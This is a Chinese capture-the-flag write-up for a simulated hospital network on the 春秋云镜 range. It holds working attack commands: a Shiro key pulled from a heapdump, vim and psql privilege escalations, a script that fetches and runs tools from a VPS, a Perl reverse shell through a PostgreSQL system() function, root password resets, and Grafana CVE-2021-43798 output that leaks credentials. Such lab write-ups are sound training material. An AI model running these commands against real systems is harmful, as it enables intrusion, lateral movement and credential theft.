春秋云镜-Hospital

Hospital

flag1

信息收集

poc-yaml-spring-actuator-heapdump-file

spingboot框架 heapdump泄露

参考Springboot之actuator配置不当的漏洞利用

访问/actuator/heapdump下载heapdump

1	`java -jar JDumpSpider-1.1-SNAPSHOT-full.jar heapdump > 1.txt`

1.txt

===========================================
SpringDataSourceProperties
-------------
not found!

===========================================
WeblogicDataSourceConnectionPoolConfig
-------------
not found!

===========================================
MongoClient
-------------
not found!

===========================================
AliDruidDataSourceWrapper
-------------
not found!

===========================================
HikariDataSource
-------------
not found!

===========================================
RedisStandaloneConfiguration
-------------
not found!

===========================================
JedisClient
-------------
not found!

===========================================
CookieRememberMeManager(ShiroKey)
-------------
algMode = CBC, key = GAYysgMQhG7/CzIJlVpR2g==, algName = AES

===========================================
OriginTrackedMapPropertySource
-------------
management.endpoints.web.exposure.include = *
server.port = 8080
spring.thymeleaf.prefix = classpath:/templates/

===========================================
MutablePropertySources
-------------
awt.toolkit = sun.awt.X11.XToolkit
sun.boot.class.path = /usr/lib/jvm/java-8-openjdk-amd64/jre/lib/resources.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/rt.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/sunrsasign.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/jsse.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/jce.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/charsets.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/jfr.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/classes
java.protocol.handler.pkgs = org.springframework.boot.loader
sun.management.compiler = HotSpot 64-Bit Tiered Compilers
sun.cpu.isalist = 
sun.jnu.encoding = UTF-8
java.runtime.version = 1.8.0_392-8u392-ga-1~20.04-b08
java.class.path = /app/login-1.0-SNAPSHOT.jar
path.separator = :
java.vm.vendor = Private Build
os.version = 5.4.0-164-generic
java.endorsed.dirs = /usr/lib/jvm/java-8-openjdk-amd64/jre/lib/endorsed
java.runtime.name = OpenJDK Runtime Environment
file.encoding = UTF-8
catalina.useNaming = false
spring.beaninfo.ignore = true
java.vm.specification.version = 1.8
os.name = Linux
java.vm.name = OpenJDK 64-Bit Server VM
local.server.port = null
user.country = US
java.vendor.url.bug = http://bugreport.sun.com/bugreport/
sun.java.command = /app/login-1.0-SNAPSHOT.jar
java.io.tmpdir = /tmp
catalina.home = /tmp/tomcat.1038200716715894093.8080
java.version = 1.8.0_392
user.home = /home/app
user.language = en
PID = 757
java.awt.printerjob = sun.print.PSPrinterJob
file.separator = /
catalina.base = /tmp/tomcat.1038200716715894093.8080
java.vm.info = mixed mode
java.specification.name = Java Platform API Specification
java.vm.specification.vendor = Oracle Corporation
java.awt.graphicsenv = sun.awt.X11GraphicsEnvironment
java.awt.headless = true
sun.io.unicode.encoding = UnicodeLittle
java.ext.dirs = /usr/lib/jvm/java-8-openjdk-amd64/jre/lib/ext:/usr/java/packages/lib/ext

===========================================
MapPropertySources
-------------
local.server.port = null

===========================================
ConsulPropertySources
-------------
not found!

===========================================
JavaProperties
-------------
java.util.logging.FileHandler.pattern = %h/java%u.log
awt.toolkit = sun.awt.X11.XToolkit
sun.cpu.isalist = 
sun.jnu.encoding = UTF-8
sun.arch.data.model = 64
catalina.useNaming = false
security.overridePropertiesFile = true
security.provider.7 = com.sun.security.sasl.Provider
sun.boot.library.path = /usr/lib/jvm/java-8-openjdk-amd64/jre/lib/amd64
sun.java.command = /app/login-1.0-SNAPSHOT.jar
security.provider.9 = sun.security.smartcardio.SunPCSC
java.specification.vendor = Oracle Corporation
security.provider.1 = sun.security.provider.Sun
security.provider.2 = sun.security.rsa.SunRsaSign
security.provider.3 = sun.security.ec.SunEC
networkaddress.cache.negative.ttl = 10
security.provider.4 = com.sun.net.ssl.internal.ssl.Provider
security.provider.5 = com.sun.crypto.provider.SunJCE
security.provider.6 = sun.security.jgss.SunProvider
file.separator = /
org.springframework.web.servlet.HandlerExceptionResolver = org.springframework.web.servlet.mvc.method.annotation.ExceptionHandlerExceptionResolver,org.springframework.web.servlet.mvc.annotation.ResponseStatusExceptionResolver,org.springframework.web.servlet.mvc.support.DefaultHandlerExceptionResolver
java.specification.name = Java Platform API Specification
java.vm.specification.vendor = Oracle Corporation
org.springframework.web.servlet.HandlerMapping = org.springframework.web.servlet.handler.BeanNameUrlHandlerMapping,org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMapping,org.springframework.web.servlet.function.support.RouterFunctionMapping
org.springframework.web.servlet.HandlerAdapter = org.springframework.web.servlet.mvc.HttpRequestHandlerAdapter,org.springframework.web.servlet.mvc.SimpleControllerHandlerAdapter,org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerAdapter,org.springframework.web.servlet.function.support.HandlerFunctionAdapter
org.springframework.web.servlet.FlashMapManager = org.springframework.web.servlet.support.SessionFlashMapManager
package.definition = sun.,com.sun.xml.internal.,com.sun.imageio.,com.sun.istack.internal.,com.sun.jmx.,com.sun.media.sound.,com.sun.naming.internal.,com.sun.proxy.,com.sun.corba.se.,com.sun.org.apache.bcel.internal.,com.sun.org.apache.regexp.internal.,com.sun.org.apache.xerces.internal.,com.sun.org.apache.xpath.internal.,com.sun.org.apache.xalan.internal.extensions.,com.sun.org.apache.xalan.internal.lib.,com.sun.org.apache.xalan.internal.res.,com.sun.org.apache.xalan.internal.templates.,com.sun.org.apache.xalan.internal.utils.,com.sun.org.apache.xalan.internal.xslt.,com.sun.org.apache.xalan.internal.xsltc.cmdline.,com.sun.org.apache.xalan.internal.xsltc.compiler.,com.sun.org.apache.xalan.internal.xsltc.trax.,com.sun.org.apache.xalan.internal.xsltc.util.,com.sun.org.apache.xml.internal.res.,com.sun.org.apache.xml.internal.resolver.helpers.,com.sun.org.apache.xml.internal.resolver.readers.,com.sun.org.apache.xml.internal.security.,com.sun.org.apache.xml.internal.serializer.utils.,com.sun.org.apache.xml.internal.utils.,com.sun.org.glassfish.,com.oracle.xmlns.internal.,com.oracle.webservices.internal.,oracle.jrockit.jfr.,org.jcp.xml.dsig.internal.,jdk.internal.,jdk.nashorn.internal.,jdk.nashorn.tools.,jdk.xml.internal.,com.sun.activation.registries.,jdk.jfr.events.,jdk.jfr.internal.,jdk.management.jfr.internal.
sun.boot.class.path = /usr/lib/jvm/java-8-openjdk-amd64/jre/lib/resources.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/rt.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/sunrsasign.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/jsse.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/jce.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/charsets.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/jfr.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/classes
java.protocol.handler.pkgs = org.springframework.boot.loader
sun.management.compiler = HotSpot 64-Bit Tiered Compilers
org.springframework.web.servlet.ThemeResolver = org.springframework.web.servlet.theme.FixedThemeResolver
java.runtime.version = 1.8.0_392-8u392-ga-1~20.04-b08
user.name = app
policy.url.1 = file:${java.home}/lib/security/java.policy
securerandom.source = file:/dev/random
policy.url.2 = file:${user.home}/.java.policy
jdk.tls.disabledAlgorithms = SSLv3, TLSv1, TLSv1.1, RC4, DES, MD5withRSA, DH keySize < 1024, EC keySize < 224, 3DES_EDE_CBC, anon, NULL, include jdk.disabled.namedCurves
policy.ignoreIdentityScope = false
file.encoding = UTF-8
java.util.logging.ConsoleHandler.formatter = java.util.logging.SimpleFormatter
jdk.sasl.disabledMechanisms = 
java.io.tmpdir = /tmp
org.springframework.web.servlet.ViewResolver = org.springframework.web.servlet.view.InternalResourceViewResolver
java.version = 1.8.0_392
jdk.tls.keyLimits = AES/GCM/NoPadding KeyUpdate 2^37
java.vm.specification.name = Java Virtual Machine Specification
PID = 757
java.awt.printerjob = sun.print.PSPrinterJob
jdk.xml.dsig.secureValidationPolicy = disallowAlg http://www.w3.org/TR/1999/REC-xslt-19991116,disallowAlg http://www.w3.org/2001/04/xmldsig-more#rsa-md5,disallowAlg http://www.w3.org/2001/04/xmldsig-more#hmac-md5,disallowAlg http://www.w3.org/2001/04/xmldsig-more#md5,maxTransforms 5,maxReferences 30,disallowReferenceUriSchemes file http https,minKeySize RSA 1024,minKeySize DSA 1024,minKeySize EC 224,noDuplicateIds,noRetrievalMethodLoops
java.library.path = /usr/java/packages/lib/amd64:/usr/lib/x86_64-linux-gnu/jni:/lib/x86_64-linux-gnu:/usr/lib/x86_64-linux-gnu:/usr/lib/jni:/lib:/usr/lib
java.vendor = Private Build
handlers = java.util.logging.ConsoleHandler
java.specification.maintenance.version = 5
sun.io.unicode.encoding = UnicodeLittle
krb5.kdc.bad.policy = tryLast
java.class.path = /app/login-1.0-SNAPSHOT.jar
jdk.security.legacyAlgorithms = SHA1, RSA keySize < 2048, DSA keySize < 2048
java.vm.vendor = Private Build
jdk.disabled.namedCurves = secp112r1, secp112r2, secp128r1, secp128r2, secp160k1, secp160r1, secp160r2, secp192k1, secp192r1, secp224k1, secp224r1, secp256k1, sect113r1, sect113r2, sect131r1, sect131r2, sect163k1, sect163r1, sect163r2, sect193r1, sect193r2, sect233k1, sect233r1, sect239k1, sect283k1, sect283r1, sect409k1, sect409r1, sect571k1, sect571r1, X9.62 c2tnb191v1, X9.62 c2tnb191v2, X9.62 c2tnb191v3, X9.62 c2tnb239v1, X9.62 c2tnb239v2, X9.62 c2tnb239v3, X9.62 c2tnb359v1, X9.62 c2tnb431r1, X9.62 prime192v2, X9.62 prime192v3, X9.62 prime239v1, X9.62 prime239v2, X9.62 prime239v3, brainpoolP256r1, brainpoolP320r1, brainpoolP384r1, brainpoolP512r1
crypto.policy = unlimited
jceks.key.serialFilter = java.lang.Enum;java.security.KeyRep;java.security.KeyRep$Type;javax.crypto.spec.SecretKeySpec;!*
login.configuration.provider = sun.security.provider.ConfigFile
user.timezone = 
java.vm.specification.version = 1.8
os.name = Linux
user.country = US
jdk.security.caDistrustPolicies = SYMANTEC_TLS
sun.cpu.endian = little
user.home = /home/app
user.language = en
en = UTF-8
jdk.tls.alpnCharset = ISO_8859_1
ssl.KeyManagerFactory.algorithm = SunX509
.level = INFO
java.awt.graphicsenv = sun.awt.X11GraphicsEnvironment
java.awt.headless = true
com.xyz.foo.level = SEVERE
policy.provider = sun.security.provider.PolicyFile
path.separator = :
fr = UTF-8
os.version = 5.4.0-164-generic
java.endorsed.dirs = /usr/lib/jvm/java-8-openjdk-amd64/jre/lib/endorsed
java.runtime.name = OpenJDK Runtime Environment
keystore.type.compat = true
org.springframework.web.servlet.RequestToViewNameTranslator = org.springframework.web.servlet.view.DefaultRequestToViewNameTranslator
spring.beaninfo.ignore = true
java.vm.name = OpenJDK 64-Bit Server VM
java.vendor.url.bug = http://bugreport.sun.com/bugreport/
java.util.logging.FileHandler.formatter = java.util.logging.XMLFormatter
java.util.logging.FileHandler.count = 1
catalina.home = /tmp/tomcat.1038200716715894093.8080
sun.cds.enableSharedLookupCache = false
sun.security.krb5.maxReferrals = 5
catalina.base = /tmp/tomcat.1038200716715894093.8080
java.util.logging.FileHandler.limit = 50000
java.vm.info = mixed mode
keystore.type = jks
java.ext.dirs = /usr/lib/jvm/java-8-openjdk-amd64/jre/lib/ext:/usr/java/packages/lib/ext
policy.expandProperties = true
securerandom.strongAlgorithms = NativePRNGBlocking:SUN

===========================================
ProcessEnvironment
-------------
not found!

===========================================
OSS
-------------
not found!

===========================================
UserPassSearcher
-------------
org.apache.shiro.web.filter.authc.FormAuthenticationFilter:
[failureKeyAttribute = shiroLoginFailure, loginUrl = /login, successUrl = /, usernameParam = username, passwordParam = password]

org.apache.catalina.startup.Tomcat:
[hostname = localhost]


===========================================
CookieThief
-------------
not found!

===========================================
AuthThief
-------------
not found!

===========================================

外网打点

发现shirokey

CookieRememberMeManager(ShiroKey)

algMode = CBC, key = GAYysgMQhG7/CzIJlVpR2g==, algName = AES

新的反弹shell工具 pwncat-cs

发现/usr/bin/vim.basic提权

1	`vim.basic -c ':python3 import os; os.execl("/bin/bash", "bash", "-pc", "reset; exec bash -p")'`

flag2

一些后渗透upload的小tag~~（也就靶场用用~~

用pwncat 上传fscan和frp

PS：这个工具的upload上传会损坏文件（生气.jpg

# 三个命令还是太多了，胜在不算麻烦 不能上传文件夹
# 模拟的终端比反弹的终端好用一万倍
# CTRL+D 返回到pwncat界面
upload /home/ubuntu/st/fscan /tmp/fscan
upload /home/ubuntu/st/frpc /tmp/frpc
upload /home/ubuntu/st/frpc.ini /tmp/frpc.ini

~~女大学生自用wget.sh？~~

# vps
python3 -m http.server -p port
# shell
wget vps:port/wget.sh && chmod +x wget.sh && ./wget.sh

#wget.sh
#!/bin/bash

# 定义要下载的文件URL列表
files=(
    "http://vpsip:port/frpc"
    "http://vpsip:port/frpc.ini"
    "http://vpsip:port/fscan"
)

# 循环遍历文件列表并下载
for file in "${files[@]}"; do
    wget "$file"
done

echo "所有文件下载完成！"
# 给下载的文件赋予执行权限
for file in "${files[@]}"; do
    # 提取文件名
    filename=$(basename "$file")
    # 赋予执行权限
    chmod 777 "$filename"
    # chmod +x "$filename"
done

echo "已为所有文件赋予执行权限！"

~~两个加起来貌似更好用？~~

内网信息收集

172.30.12.5 web1 shiro 已拿下

172.30.12.6:8848 nacos

172.30.12.236:8080 web3 fastjson

内网打点

172.30.12.6:8848

内网的172.30.12.6:8848是Nacos，

存在Nacos Derby SQL Injection漏洞

~~其实也可以打SnakeYaml~~

冰蝎连接

172.30.12.236:8080

172.30.12.236:8080是打Fastjson反序列化

fastjson插件

12.236不出网，但好在拿下了12.5

把12.236的shell反弹到12.5上

~~貌似不行？~~

用插件写入内存马（第二个）

root权限，这里修改一下root的密码，方便后续利用

修改web3的root密码

1	`echo 'root:123456' \| sudo chpasswd`

可以用web1的机器ssh连接

双网卡

上传fscan扫描一下

~~这里可以搭双层代理~~

再次把172.30.54.*代理到172.30.12，这样就可以用代理访问了

172.30.12.5存在python3 起个http服务把fscan frp下载到236上

~~慢的很~~

用哥斯拉工具自带的大文件上传上传上去

172.30.54.179:22 open
172.30.54.179:8080 open
172.30.54.12:5432 open
172.30.54.12:22 open
172.30.54.12:3000 open
172.30.54.179:8009 open
[] WebTitle http://172.30.54.12:3000 code:302 len:29 title:None 跳转url: http://172.30.54.12:3000/login
[] WebTitle http://172.30.54.179:8080 code:200 len:3964 title:医院后台管理平台
[*] WebTitle http://172.30.54.12:3000/login code:200 len:27909 title:Grafana

多层代理

尝试frp搭建~~（失败）~~

1 2	`[common] bind_port = 7000`

[common]
server_addr = 172.30.54.179
server_port = 7000
tls_enable = true
pool_count = 5

[plugin_socks2]
type = tcp
remote_port = 46075
plugin = socks5
use_encryption = true
use_compression = true

改用Stowaway

参考https://fushuling.com/index.php/2023/09/21/%e5%86%85%e7%bd%91%e4%bb%a3%e7%90%86%e6%90%ad%e5%bb%ba/#/

172.30.54.12

访问发现是grafana 打 CVE-2021-43798

读取postgresql密码

https://github.com/A-D-Team/grafanaExp/releases

./grafanaExp_linux_amd64 exp -u http://172.30.54.12:3000
2024/01/06 20:36:23 Target vulnerable has plugin [alertlist]
2024/01/06 20:36:23 Got secret_key [SW2YcwTIb9zpOOhoPsMm]
2024/01/06 20:36:23 There is [0] records in db.
2024/01/06 20:36:24 type:[postgres]	name:[PostgreSQL]		url:[localhost:5432]	user:[postgres]	password[Postgres@123]	database:[postgres]	basic_auth_user:[]	basic_auth_password:[]
2024/01/06 20:36:24 All Done, have nice day!

user:[postgres]

password[Postgres@123]

修改root密码，提权的时候需要，不改也可以

1	`ALTER USER root WITH PASSWORD '123456';`

用web1去连web3的ssh 监听端口，前面用的哥斯拉工具不行

用perl弹shell

1	`CREATE OR REPLACE FUNCTION system (cstring) RETURNS integer AS '/lib/x86_64-linux-gnu/libc.so.6', 'system' LANGUAGE 'c' STRICT;`

select system('perl -e \'use Socket;$i="172.30.54.179";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\'');

提权

1	`python3 -c 'import pty;pty.spawn("/bin/bash")'`

步骤如下

1
2
3

sudo /usr/local/postgresql/bin/psql
\?
!/bin/bash

春秋云镜

#Nacos

春秋云镜-Delivery 上一篇

春秋云镜-Privilege 下一篇